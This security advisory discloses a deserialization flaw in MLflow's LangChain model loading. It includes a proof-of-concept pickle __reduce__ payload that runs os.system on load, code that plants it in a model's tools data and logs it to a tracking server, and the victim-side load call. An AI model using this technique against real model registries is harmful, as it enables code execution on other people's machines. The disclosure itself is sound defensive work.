SAI Security Advisory

Cloudpickle Load on Langchain AgentExecutor Model Load Leading to Code Execution

June 4, 2024

Summary

A deserialization vulnerability exists in the _load_from_pickle function of the mlflow/langchain/utils.py file. An attacker can inject a malicious pickle object into a model file on upload, which is then deserialized when the model is loaded, executing the malicious code on the victim's machine.

Products Impacted

This vulnerability was introduced in version 2.5.0 of MLflow.

CVSS Score: 8.8

AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE Categorization

CWE-502: Deserialization of Untrusted Data.

Details

The vulnerability exists in the _load_from_pickle function within the mlflow/langchain/utils.py file. This function is invoked whenever mlflow.langchain.load_model is called.

def _load_from_pickle(path):
    with open(path, "rb") as f:
        return cloudpickle.load(f)

An attacker can exploit this by building an AgentExecutor with Tools specially crafted to reach the elif branch below within the _save_base_lcs function of the same utils.py file. The attacker can alter the code in this method so that, instead of the legitimate tools data, a pickle object that executes arbitrary code when deserialized is passed to cloudpickle.dump().

elif isinstance(model, langchain.agents.agent.AgentExecutor):
    ...

    if model.tools:
        tools_data_path = os.path.join(path, _TOOLS_DATA_FILE_NAME)
        try:
            # Attacker-inserted payload: pickle invokes __reduce__ on
            # deserialization, running os.system on the victim's machine
            class RunCommand:
                def __reduce__(self):
                    return (os.system, ('ping -c 4 8.8.8.8',))

            # The malicious object is written where the legitimate
            # tools data would normally be serialized
            command = RunCommand()
            with open(tools_data_path, "wb") as f:
                cloudpickle.dump(command, f)

This model can then be logged to the server at the specified tracking URI by calling the mlflow.langchain.log_model() function.
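A minimal attacker-side sketch of this flow is below. The tracking server URL, the FakeListLLM stand-in, and the no-op tool are illustrative assumptions, and LangChain import paths vary between versions:

import mlflow
from langchain.agents import AgentType, Tool, initialize_agent
from langchain.llms.fake import FakeListLLM

# Any AgentExecutor with at least one Tool reaches the modified
# elif branch in _save_base_lcs when the model is serialized
llm = FakeListLLM(responses=["Final Answer: done"])
tools = [Tool(name="noop", func=lambda q: q, description="Does nothing.")]
agent = initialize_agent(tools, llm, agent=AgentType.ZERO_SHOT_REACT_DESCRIPTION)

mlflow.set_tracking_uri("http://tracking-server:5000")  # assumed shared server
with mlflow.start_run():
    mlflow.langchain.log_model(
        agent,
        artifact_path="langchain_model",
        registered_model_name="LangchainPickle",
    )

Registering the model as "LangchainPickle" matches the victim-side load URI shown below.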

When the model is loaded by the victim (example code snippet below), the arbitrary code is executed on their machine:

import mlflow
...
logged_model = "models:/LangchainPickle/1"
# Loading the model deserializes the pickled tools data, executing the payload
loaded_model = mlflow.langchain.load_model(logged_model, dst_path='/tmp/langchain_model')
